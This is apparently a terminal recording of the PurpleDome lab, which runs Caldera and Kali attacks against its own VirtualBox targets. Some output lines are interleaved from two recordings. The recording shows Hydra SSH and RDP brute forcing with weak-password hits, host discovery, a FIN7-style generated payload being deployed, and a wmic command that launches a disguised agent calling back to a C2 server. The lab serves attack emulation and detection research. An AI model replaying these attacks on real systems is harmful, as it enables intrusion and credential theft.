[253.100916, "o", ".\r\n"] [371.608795, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"]
[254.107019, "o", ".\r\n"] [371.666169, "o", " 1 file(s) copied.\r\r\n"]
[255.113229, "o", ".\r\n"] [371.681221, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"]
[256.119078, "o", ".\r\n"] [371.746656, "o", " 1 file(s) copied.\r\r\n"]
[257.124811, "o", ".\r\n"] [371.760721, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"]
[258.130561, "o", ".\r\n"] [371.830233, "o", "The operation completed successfully.\r\r\r\n"]
[259.136545, "o", ".\r\n"] [371.847954, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"]
[260.142284, "o", ".\r\n"] [371.922877, "o", "The operation completed successfully.\r\r\r\n"]
[261.147564, "o", ".\r\n"] [371.942729, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nThe operation completed successfully.\r\n\r\nDebug: Stderr: The operation completed successfully.\r\n"]
[262.153097, "o", ".\r\n"] [372.015059, "o", "The operation completed successfully.\r\r\r\n"]
[263.159054, "o", ".\r\n"] [372.03526, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nThe operation completed successfully.\r\n\r\nDebug: Stderr: The operation completed successfully.\r\n"]
[264.164656, "o", ".\r\n"] [374.191468, "o", "\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 2 START_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x0\r\r\n WAIT_HINT : 0x7d0\r\r\n PID : 984\r\r\n FLAGS : \r\r\n"]
[265.170309, "o", ".\r\n"] [374.612598, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 2 START_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x0\r\r\n WAIT_HINT : 0x7d0\r\r\n PID : 984\r\r\n FLAGS :\r\n\r\n(no stderr)\r\n"]
[266.175776, "o", ".\r\n"] [376.733509, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[267.181497, "o", ".\r\n"] [441.799386, "o", "\u001b[92mTarget is up: target2 \u001b[0m\r\n\u001b[94mpreparing target target3 ....\u001b[0m\r\n"]
[268.187033, "o", ".\r\n"] [441.802436, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"]
[269.192857, "o", ".\r\n"] [441.802622, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"]
[270.198772, "o", ".\r\n"] [445.219168, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"]
[271.20458, "o", ".\r\n"] [445.219374, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"]
[272.210351, "o", ".\r\n"] [612.735313, "o", "\u001b[92mTarget is up: target3 \u001b[0m\r\n"]
[273.215974, "o", ".\r\n"] [613.105912, "o", "The account already exists.\r\r\n\r\r\n"]
[274.221582, "o", ".\r\n"] [613.106507, "o", "More help is available by typing NET HELPMSG 2224.\r\r\n"]
[275.227259, "o", ".\r\n"] [613.106678, "o", "\r\r\n"]
[276.232114, "o", ".\r\n"] [613.377246, "o", "The account already exists.\r\r\n\r\r\n"]
[277.238006, "o", ".\r\n"] [613.377462, "o", "More help is available by typing NET HELPMSG 2224.\r\r\n"]
[278.244737, "o", ".\r\n"] [613.377569, "o", "\r\r\n"]
[279.250372, "o", ".\r\n"] [613.651823, "o", "The account already exists.\r\r\n\r\r\nMore help is available by typing NET HELPMSG 2224.\r\r\n"]
[280.255877, "o", ".\r\n"] [613.651996, "o", "\r\r\n"]
[281.261142, "o", ".\r\n"] [613.919243, "o", "The account already exists.\r\r\n"]
[282.266827, "o", ".\r\n"] [613.919426, "o", "\r\r\nMore help is available by typing NET HELPMSG 2224.\r\r\n"]
[283.276212, "o", ".\r\n"] [613.91954, "o", "\r\r\n"]
[284.281898, "o", ".\r\n"] [614.175234, "o", "System error 1378 has occurred.\r\r\n"]
[285.292303, "o", "Output: vagrant\r\n"] [614.175403, "o", "\r\r\nThe specified account name is already a member of the group.\r\r\n"]
[285.302496, "o", "\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\n"] [614.17558, "o", "\r\r\n"]
[285.331901, "o", "\u001b[94mRunning Kali plugin hydra\u001b[0m\r\nConnecting to vagrant@127.0.0.1:2222\r\n"] [614.426216, "o", "System error 1378 has occurred.\r\r\n"]
[285.334009, "o", "<Connection host=127.0.0.1 user=vagrant port=2222>\r\n"] [614.426371, "o", "\r\r\n"]
[285.540974, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-08 09:43:11\r\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"] [614.426466, "o", "The specified account name is already a member of the group.\r\r\n"]
[285.54132, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 35 login tries (l:5/p:7), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.78:22/\r\n"] [614.426641, "o", "\r\r\n"]
[287.670203, "o", "[22][ssh] host: 192.168.178.78 login: password password: passw0rd\r\n"] [614.687573, "o", "System error 1378 has occurred.\r\r\n\r\r\nThe specified account name is already a member of the group.\r\r\n"]
[289.605076, "o", "1 of 1 target successfully completed, 1 valid password found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\n"] [614.687686, "o", "\r\r\n"]
[289.605222, "o", "[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n"] [614.952564, "o", "System error 1378 has occurred.\r\r\n"]
[289.605332, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-08 09:43:15\r\n"] [614.952665, "o", "\r\r\n"]
[289.633459, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\nAttacking machine with PAW: target2w\r\n"] [614.952793, "o", "The specified account name is already a member of the group.\r\r\n"]
[289.735264, "o", "\u001b[92mExecuted attack operation\u001b[0m\r\n"] [614.95295, "o", "\r\r\n"]
[289.737673, "o", ".\r\n"] [615.211853, "o", "The operation completed successfully.\r\r\r\n"]
[290.743309, "o", ".\r\n"] [615.230597, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"]
[291.749143, "o", ".\r\n"] [615.69261, "o", "\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\r\n"]
[292.75563, "o", ".\r\n"] [615.692721, "o", "\r\r\n"]
[293.761762, "o", ".\r\n"] [615.731812, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\n\r\n(no stderr)\r\n"]
[294.767529, "o", ".\r\n"] [615.768572, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[295.773933, "o", ".\r\n"] [615.871724, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[296.779098, "o", ".\r\n"] [615.894056, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[297.785246, "o", ".\r\n"] [615.94657, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[298.79125, "o", ".\r\n"] [616.252327, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"]
[299.796894, "o", ".\r\n"] [616.522501, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"]
[300.803806, "o", ".\r\n"] [616.77925, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[301.809912, "o", ".\r\n"] [616.88319, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[302.81538, "o", ".\r\n"] [616.968447, "o", "[SC] StartService FAILED 1056:\r\r\n\r\r\nAn instance of the service is already running.\r\r\n\r\r\n"]
[303.821704, "o", ".\r\n"] [617.223748, "o", "[SC] StartService FAILED 1056:\r\r\n\r\r\nAn instance of the service is already running.\r\r\n\r\r\n"]
[304.827187, "o", ".\r\n"] [619.574809, "o", "Executing (Win32_Process)->Create()\r\r\r\n"]
[305.832174, "o", ".\r\n"] [619.605721, "o", "Method execution successful.\r\r\r\nOut Parameters:\r\r\ninstance of __PARAMETERS\r\r\n{\r\r\n\tProcessId = 4092;\r\r\n\tReturnValue = 0;\r\r\n};\r\r\n"]
[306.837548, "o", ".\r\n"] [619.605843, "o", "\r\r\n"]
[307.843364, "o", ".\r\n"] [619.657522, "o", "Command exited with status 0.\r\n=== stdout ===\r\nExecuting (Win32_Process)->Create()\r\r\r\nMethod execution successful.\r\r\r\nOut Parameters:\r\r\ninstance of __PARAMETERS\r\r\n{\r\r\n\tProcessId = 4092;\r\r\n\tReturnValue = 0;\r\r\n};\r\n\r\n=== stderr ===\r\n\r\n\r\nDebug: Stderr: \r\n"]
[308.849045, "o", ".\r\n"] [624.900179, "o", "cp: './idpx' and '/home/vagrant/idpx' are the same file\r\n"]
[309.854627, "o", ".\r\n"] [625.360739, "o", "cp: './idpx' and '/home/vagrant/idpx' are the same file\r\n"]
[310.859799, "o", ".\r\n"] [625.666636, "o", "None\r\n\u001b[94mStarting Caldera client target2 \u001b[0m\r\n"]
[311.865091, "o", ".\r\n"] [626.241241, "o", "wmic process call create \"%userprofile%\\splunkd.go -server http://192.168.178.132:8888 -group red_windows -paw target2w\" \r\n"]
[312.871194, "o", ".\r\n"] [626.255297, "o", "None\r\n\u001b[92mCaldera client started \u001b[0m\r\n"]
[313.877016, "o", ".\r\n"] [626.255338, "o", "\u001b[92mInitial start of caldera client: target3 \u001b[0m\r\n\u001b[94mStarting Caldera client target3 \u001b[0m\r\n"]
[314.883502, "o", ".\r\n"] [626.264956, "o", "cd /home/vagrant; chmod +x caldera_agent.sh; nohup bash ./caldera_agent.sh\r\n"]
[315.889784, "o", ".\r\n"] [626.266353, "o", "None\r\n\u001b[92mCaldera client started \u001b[0m\r\n"]
[316.895866, "o", ".\r\n"] [626.266412, "o", "\u001b[92mInitial start of caldera client: target3 \u001b[0m\r\n"]
[317.900879, "o", ".\r\n"] [646.285467, "o", "\u001b[94mContacting caldera agents on all targets ....\u001b[0m\r\n"]
[318.905719, "o", ".\r\n"] [646.293778, "o", "\u001b[92mCaldera agents reached\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\n"]
[319.915607, "o", "Output: target2w\\purpledome\r\r\n"] [646.754051, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221271.460396', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
[319.925076, "o", "\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\n"] [646.758928, "o", "Got:\r\n"]
[319.943831, "o", "\u001b[94mRunning Kali plugin hydra\u001b[0m\r\nConnecting to vagrant@127.0.0.1:2222\r\n"] [646.760695, "o", "[]\r\n"]
[319.945699, "o", "<Connection host=127.0.0.1 user=vagrant port=2222>\r\n"] [646.954014, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: bd527b63-9f9e-46e0-9816-b8434d2b8989 \u001b[0m\r\n\u001b[104m Current User: Obtain user from current session \u001b[0m\r\n"]
[320.026581, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-08 09:43:46\r\n"] [687.011907, "o", "'target2w\\\\attackx\\r'\r\n"]
[320.026727, "o", "[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"] [687.313306, "o", "\u001b[94mRestarting caldera server and waiting for clients to re-connect\u001b[0m\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"]
[320.026917, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 35 login tries (l:5/p:7), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.189:22/\r\n"] [687.345847, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[323.093246, "o", "1 of 1 target completed, 0 valid password found\r\n"] [687.370986, "o", "None\r\n"]
[323.093366, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-08 09:43:49\r\n"] [697.460587, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"]
[323.107755, "o", "\u001b[92mFinished Kali attacks\u001b[0m\r\n\u001b[94mStopping machine: target1 \u001b[0m\r\n"] [731.612754, "o", "\u001b[92mRestarted caldera server clients re-connected\u001b[0m\r\n"]
[387.451531, "o", "\u001b[92mMachine stopped: target1\u001b[0m\r\n\u001b[94mStopping machine: target2 \u001b[0m\r\n"] [732.055067, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221356.779327', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
[390.6315, "o", "\u001b[92mMachine stopped: target2\u001b[0m\r\n\u001b[94mStopping machine: attacker \u001b[0m\r\n"] [732.06055, "o", "Got:\r\n"]
[395.805543, "o", "\u001b[92mMachine stopped: attacker\u001b[0m\r\n"] [732.062419, "o", "[]\r\n"]
[395.826481, "o", "\u001b]0;thorsten@big: /home/PurpleDome\u0007\u001b[01;32mthorsten@big\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "] [732.256434, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target3 Group: red_linux Ability: bd527b63-9f9e-46e0-9816-b8434d2b8989 \u001b[0m\r\n\u001b[104m Current User: Obtain user from current session \u001b[0m\r\n"]
[398.414983, "o", "exit\r\n"] [792.342252, "o", "'vagrant'\r\n"]
[792.654227, "o", "\u001b[94mRestarting caldera server and waiting for clients to re-connect\u001b[0m\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"]
[792.686988, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"]
[792.688926, "o", "None\r\n"]
[802.77716, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"]
[828.884346, "o", "\u001b[92mRestarted caldera server clients re-connected\u001b[0m\r\n\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\nAttacking machine with PAW: target2w with attack: fin7_1\r\n"]
[828.887288, "o", "\u001b[94mStep 1: Initial Breach\u001b[0m\r\n\u001b[92mEnd Step 1: Initial Breach\u001b[0m\r\n\u001b[94mStep 2: Delayed Malware Execution\u001b[0m\r\n\u001b[92mEnd Step 2: Delayed Malware Execution\u001b[0m\r\n"]
[828.887345, "o", "\u001b[94mStep 3: Target Assessment\u001b[0m\r\n\u001b[96mnew view \u001b[0m\r\n"]
[829.351867, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221454.053941', 'rules': [], 'relationships': [], 'facts': [{'trait': 'remote.host.fqdn', 'value': '192.168.178.189'}]}\r\n"]
[829.358865, "o", "Got:\r\n"]
[829.360445, "o", "[]\r\n"]
[829.55338, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: deeac480-5c2a-42b5-90bb-41675ee53c7e \u001b[0m\r\n\u001b[104m View remote shares: View the shares of a remote host \u001b[0m\r\n"]
[869.610888, "o", "('Shared resources at \\\\\\\\192.168.178.189\\r'\r\n '\\r'\r\n '\\r'\r\n '\\r'\r\n 'Share name Type Used as Comment \\r'\r\n '\\r'\r\n '-------------------------------------------------------------------------------\\r'\r\n 'ADMIN$ Disk Remote Admin \\r'\r\n 'C$ Disk Default share \\r'\r\n 'IPC$ IPC Remote IPC \\r'\r\n 'The command completed successfully.\\r'\r\n '\\r')\r\n"]
[869.913776, "o", "\u001b[96mget-wmiobject win32_computersystem | fl model\u001b[0m\r\n"]
[870.362918, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221495.0803838', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
[870.368332, "o", "Got:\r\n"]
[870.370061, "o", "[]\r\n"]
[870.54879, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 5dc841fd-28ad-40e2-b10e-fb007fe09e81 \u001b[0m\r\n\u001b[104m Virtual or Real: Determine if the system is virtualized or physical \u001b[0m\r\n"]
[910.610526, "o", "'\\r\\rmodel : VirtualBox\\r\\r\\r\\r'\r\n"]
[910.911601, "o", "\u001b[96mquery USERNAME env\u001b[0m\r\n"]
[911.366975, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221536.0781682', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
[911.374615, "o", "Got:\r\n"]
[911.376091, "o", "[]\r\n"]
[911.568012, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: c0da588f-79f0-4263-8998-7496b1a40596 \u001b[0m\r\n\u001b[104m Identify active user: Find user running agent \u001b[0m\r\n"]
[961.634485, "o", "'AttackX\\r'\r\n"]
[961.922261, "o", "\u001b[96mNetwork configuration discovery. Original is some WMI, here we are using nbstat\u001b[0m\r\n"]
[962.354441, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221587.0888445', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
[962.361309, "o", "Got:\r\n"]
[962.363184, "o", "[]\r\n"]
[962.565536, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 14a21534-350f-4d83-9dd7-3c56b93a0c17 \u001b[0m\r\n\u001b[104m Find Domain: Find Domain information \u001b[0m\r\n"]
[1022.651477, "o", "(' \\r'\r\n 'Ethernet:\\r'\r\n 'Node IpAddress: [10.0.2.15] Scope Id: []\\r'\r\n '\\r'\r\n ' NetBIOS Local Name Table\\r'\r\n '\\r'\r\n ' Name Type Status\\r'\r\n ' ---------------------------------------------\\r'\r\n ' TARGET2W <00> UNIQUE Registered \\r'\r\n ' WORKGROUP <00> GROUP Registered \\r'\r\n ' TARGET2W <20> UNIQUE Registered \\r'\r\n ' \\r'\r\n 'Ethernet 2:\\r'\r\n 'Node IpAddress: [192.168.178.189] Scope Id: []\\r'\r\n '\\r'\r\n ' NetBIOS Local Name Table\\r'\r\n '\\r'\r\n ' Name Type Status\\r'\r\n "]
[1022.651596, "o", "' ---------------------------------------------\\r'\r\n ' TARGET2W <00> UNIQUE Registered \\r'\r\n ' WORKGROUP <00> GROUP Registered \\r'\r\n ' TARGET2W <20> UNIQUE Registered \\r')\r\n"]
[1022.975533, "o", "\u001b[96mSystem info discovery, as close as it gets\u001b[0m\r\n"]
[1023.474736, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221648.1421063', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
[1023.480623, "o", "Got:\r\n"]
[1023.482996, "o", "[]\r\n"]
[1023.687796, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: b6b105b9-41dc-490b-bc5c-80d699b82ce8 \u001b[0m\r\n\u001b[104m Find OS Version: Find OS Version \u001b[0m\r\n"]
[1053.731621, "o", "('\\r'\r\n 'Major Minor Build Revision\\r'\r\n '----- ----- ----- --------\\r'\r\n '10 0 19042 0 \\r'\r\n '\\r'\r\n '\\r')\r\n"]
[1054.052628, "o", "\u001b[96mTake screenshot\u001b[0m\r\n"]
[1054.464586, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221679.219213', 'rules': [], 'relationships': [], 'facts': []}\r\n"]
[1054.469042, "o", "Got:\r\n"]
[1054.470495, "o", "[]\r\n"]
[1054.651863, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 316251ed-6a28-4013-812b-ddf5b5b007f8 \u001b[0m\r\n\u001b[104m Screen Capture: capture the contents of the screen \u001b[0m\r\n"]
[1124.744184, "o", "('Exception calling \"CopyFromScreen\" with \"3\" argument(s): \"The handle is '\r\n 'invalid\"\\r'\r\n 'At line:1 char:252\\r'\r\n '+ ... ge($bmp); $graphics.CopyFromScreen($bounds.Location, [Drawing.Point '\r\n '...\\r'\r\n '+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r'\r\n ' + CategoryInfo : NotSpecified: (:) [], '\r\n 'MethodInvocationException\\r'\r\n ' + FullyQualifiedErrorId : Win32Exception\\r'\r\n ' \\r')\r\n"]
[1125.047509, "o", "\u001b[92mEnd Step 3: Target Assessment\u001b[0m\r\n\u001b[94mStep 4: Staging Interactive Toolkit\u001b[0m\r\n\u001b[96mCreate babymetal replacement\u001b[0m\r\n"]
[1129.833274, "o", "No encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\n"]
[1129.835002, "o", "Saved as: babymetal.exe\r\n"]
[1129.880806, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nNo encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\nSaved as: babymetal.exe\r\n\r\nDebug: Stderr: No encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\nSaved as: babymetal.exe\r\n"]
[1129.943892, "o", "\u001b[96mGenerated babymetal.exe...deploying it\u001b[0m\r\n"]
[1129.994568, "o", "None\r\n"]
[1129.994607, "o", "\u001b[96mExecuted payload babymetal.exe on target2 \u001b[0m\r\n\u001b[92mEnd Step 4: Staging Interactive Toolkit\u001b[0m\r\n\u001b[94mStep 5: Escalate Privileges\u001b[0m\r\n\u001b[92mEnd Step 5: Escalate Privileges\u001b[0m"]
[1129.994741, "o", "\r\n\u001b[94mStep 6: Expand Access\u001b[0m\r\n\u001b[92mEnd Step 6: Expand Access\u001b[0m\r\n\u001b[94mStep 7: Setup User Monitoring\u001b[0m\r\n\u001b[92mEnd Step 7: Setup User Monitoring\u001b[0m\r\n\u001b[94mStep 8: User Monitoring\u001b[0m\r\n\u001b[92mEnd Step 8: User Monitoring\u001b[0m\r\n\u001b[94mStep 9: Setup Shim Persistence\u001b[0m\r\n\u001b[92mEnd Step 9: Setup Shim Persistence\u001b[0m\r\n\u001b[94mStep 10: Steal Payment Data\u001b[0m\r\n\u001b[92mEnd Step 10: Steal Payment Data\u001b[0m\r\n"]
[1134.999777, "o", "Attacking machine with PAW: target3 with attack: hydra\r\n"]
[1135.011154, "o", "zsh:cd:1: no such file or directory: None\r\n"]
[1135.020669, "o", "\r\nWARNING: apt does not have a stable CLI interface. Use with caution in scripts.\r\n\r\n"]
[1135.025903, "o", "Reading package lists..."]
[1135.05476, "o", "\r\n"]
[1135.056144, "o", "Building dependency tree..."]
[1135.180674, "o", "\r\nReading state information..."]
[1135.183021, "o", "\r\n"]
[1135.34485, "o", "hydra is already the newest version (9.1-1).\r\n0 upgraded, 0 newly installed, 0 to remove and 1389 not upgraded.\r\n"]
[1135.399219, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\n"]
[1135.39932, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:55:59\r\n"]
[1135.399495, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 40 login tries (l:5/p:8), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.145:22/\r\n"]
[1135.399547, "o", "[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"]
[1135.898263, "o", "[22][ssh] host: 192.168.178.145 login: test password: test\r\n"]
[1138.064322, "o", "[22][ssh] host: 192.168.178.145 login: password password: passw0rd\r\n"]
[1143.558955, "o", "[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n"]
[1143.559084, "o", "1 of 1 target successfully completed, 2 valid passwords found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:07\r\n"]
[1143.58797, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\n"]
[1143.588112, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:56:07\r\n[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.\r\n"]
[1143.588226, "o", "[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n"]
[1143.588418, "o", "[DATA] max 4 tasks per 1 server, overall 4 tasks, 40 login tries (l:5/p:8), ~10 tries per task\r\n[DATA] attacking rdp://192.168.178.145:3389/\r\n"]
[1144.144217, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n"]
[1144.148391, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n"]
[1144.148795, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n"]
[1144.149246, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n"]
[1144.157408, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n"]
[1144.159518, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n"]
[1144.160769, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n"]
[1144.161189, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n"]
[1144.169608, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n"]
[1144.169715, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n"]
[1144.170303, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty, continuing attacking the account.\r\n"]
[1144.170512, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n"]
[1144.178448, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n"]
[1144.179424, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing attacking the account.\r\n"]
[1144.179691, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: password, continuing attacking the account.\r\n"]
[1144.18033, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: passw0rd, continuing attacking the account.\r\n"]
[1144.188691, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwertz, continuing attacking the account.\r\n"]
[1144.189722, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwert, continuing attacking the account.\r\n"]
[1144.191904, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: 12345, continuing attacking the account.\r\n"]
[1144.193944, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: qwerty, continuing attacking the account.\r\n"]
[1144.199675, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: test, continuing attacking the account.\r\n[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: swordfish, continuing attacking the account.\r\n"]
[1144.200299, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: password, continuing attacking the account.\r\n"]
[1144.200436, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: password password: passw0rd, continuing attacking the account.\r\n"]
[1144.209136, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwert, continuing attacking the account.\r\n"]
[1144.20928, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwerty, continuing attacking the account.\r\n"]
[1144.209856, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: nonexistend_user_1 password: qwertz, continuing attacking the account.\r\n"]
